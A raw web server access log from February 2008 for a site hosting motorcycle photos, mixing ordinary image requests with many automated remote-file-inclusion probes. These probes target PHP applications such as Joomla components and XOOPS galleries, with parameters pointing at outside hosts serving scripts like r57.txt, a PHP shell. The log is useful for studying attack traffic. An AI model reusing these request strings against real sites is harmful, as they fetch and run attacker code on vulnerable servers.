62.151.23.213 - - [08/Feb/2008:04:48:38 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
71.70.134.227 - - [08/Feb/2008:04:49:06 -0800] "GET /logs/access_080108.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [08/Feb/2008:04:49:07 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [08/Feb/2008:04:49:07 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.156.153 - - [08/Feb/2008:04:49:33 -0800] "GET /logs/access.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [08/Feb/2008:04:49:33 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:34 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:34 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.156.153 - - [08/Feb/2008:04:49:34 -0800] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:34 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:35 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:35 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:36 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.222.174.45 - - [08/Feb/2008:04:49:37 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:04:49:46 -0800] "GET /logs/access_080121.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:49:47 -0800] "GET /index.php?sourcedir=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:04:50:36 -0800] "GET /logs/access.log/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:04:50:36 -0800] "GET /logs/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:51:46 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.105 - - [08/Feb/2008:04:53:00 -0800] "GET /logs/access_071230.log/index:php?pageurl=http://electrobox106.com/ow33.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [08/Feb/2008:04:53:00 -0800] "GET /logs/index:php?pageurl=http://electrobox106.com/ow33.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:53:20 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:53:20 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:04:53:33 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:04:53:41 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:04:53:41 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:04:53:59 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.35.191.105 - - [08/Feb/2008:04:54:15 -0800] "GET /logs/access_071225.log/index:php?pageurl=http://electrobox106.com/ow33.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:04:55:02 -0800] "GET /logs/access_080106.log/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:55:58 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:55:58 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:55:58 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:04:56:10 -0800] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:56:27 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:56:27 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:56:27 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:04:56:42 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:33 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:33 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:33 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:35 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:36 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:36 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:36 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:37 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:37 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:38 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:39 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:04:57:39 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?p=383524" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:42 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:43 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:43 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:46 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:46 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4371M.JPG HTTP/1.1" 200 98619 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:48 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:48 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:57:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:04 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:04 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:04:58:05 -0800] "GET /logs/access_080106.log/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:06 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:58:09 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4388M.JPG HTTP/1.1" 200 56735 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:04:59:23 -0800] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:04:59:23 -0800] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:29 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:31 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:33 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:34 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:35 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
67.60.162.149 - - [08/Feb/2008:04:59:40 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
